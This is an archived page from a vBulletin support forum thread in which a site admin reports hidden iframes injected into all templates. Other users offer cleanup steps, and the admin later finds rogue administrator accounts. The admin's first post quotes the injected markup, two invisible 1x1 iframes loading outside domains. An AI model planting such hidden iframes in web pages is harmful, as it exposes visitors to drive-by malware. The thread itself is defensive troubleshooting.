vb.org Archive
Page 1 of 4 1 23 Last »
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   iframe injected into all templates (https://vborg.vbsupport.ru/showthread.php?t=301892)

dawges 09-04-2013 08:35 PM
iframe injected into all templates
 
I have searched Google and have found a couple of forums suffering the same fate.

Today all of a sudden I noticed my pages loading slow so i looked at the code. I see a iframe at the bottom of all my pages:

Code:
<iframe src="http://damnxd.org/dns.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://www.jobless-jack.com/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
My question is, how did it get there and how do i get rid of it?

--------------- Added [DATE]1378334265[/DATE] at [TIME]1378334265[/TIME] ---------------

I am running version 4.2.0 by the way.

ozzy47 09-04-2013 08:47 PM
You may want to check your templates and see if you were hacked and someone added it into your templates.

dawges 09-04-2013 08:58 PM
Quote:
Originally Posted by ozzy47 (Post 2443275)
You may want to check your templates and see if you were hacked and someone added it into your templates.
I checked the footer template but i dont know what to look for. I dont see the code just jump out.

ozzy47 09-04-2013 09:00 PM
Ok next step is to disable all plugins to see if it is coming from there.

Open your config.php and below<?php add this line:

PHP Code:
 define('DISABLE_HOOKS'true); 
So it looks like this:
PHP Code:
<?php
define('DISABLE_HOOKS'true);
/*=================================================  =====================*\
|| ##################################################  ################## ||
|| # vBulletin 4.1.4
Then check the page again and see if the iframe is still there.

TheLastSuperman 09-04-2013 09:19 PM
If you have vBSEO installed this is very likely, could also be from the recently discovered install directory exploit we are unsure without actually investigating it ourselves.

Try running the queries listed on my blog post scroll down to find "Run the following Queries in phpMyAdmin" and do so - http://www.vbulletin.com/forum/blogs...vbulletin-site

Some basics:
  1. Start off by replacing all files with 100% fresh vbulletin files of the exact same version.
  2. Next run queries listed on the blog and investigate all that come up. If your not running a custom style then first delete any malicious plugins/templates and you can delete the default style and remake a new one (create a new style after removing the malicious plugins etc then delete the old one otherwise your primary is the default and it will not allow you to delete etc).
  3. Next check filesystem - AdminCP > Maintenance > Diagnostics > Suspect File Versions and check to see what is listed, cross reference that via FTP and inspect file dates etc; Anything named odd should be investigated i.e. sexy.php, lol.php anything seemingly odd however not all hackers are so apparent they could have named it crontools.php or something you would if not 100% familiar with the product assume was a normal file so take your time checking.
  4. Once you feel its clean, either create or login your Google webmaster tools and request the site be checked, once they verify its clean you're normally good to go.

ozzy47 09-04-2013 09:22 PM
Thanks Mike, I knew I seen that somewhere before, I just could not for the life of me remember where it was.

TheLastSuperman 09-04-2013 09:27 PM
Quote:
Originally Posted by ozzy47 (Post 2443283)
Thanks Mike, I knew I seen that somewhere before, I just could not for the life of me remember where it was.
lol tis now bookmarked, I've been visiting profile on vb.com them finding all blog posts lololol :p.

dawges 09-04-2013 09:27 PM
Disabling Hooks does nothing, the iframe stays.

Superman I do not have vBSEO installed, However i will read the post you provided and report back.

ozzy47 09-04-2013 09:29 PM
Hmmm then it may be in the files somewhere, if it is not in the templates or plugins. Let us know what you come up with after following the post.

dawges 09-04-2013 09:29 PM
I have 4 new administrator in my admin group. All hackers.


All times are GMT. The time now is 10:35 PM.
Page 1 of 4 1 23 Last »
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01778 seconds
  • Memory Usage 1,738KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (2)bbcode_php_printable
  • (2)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete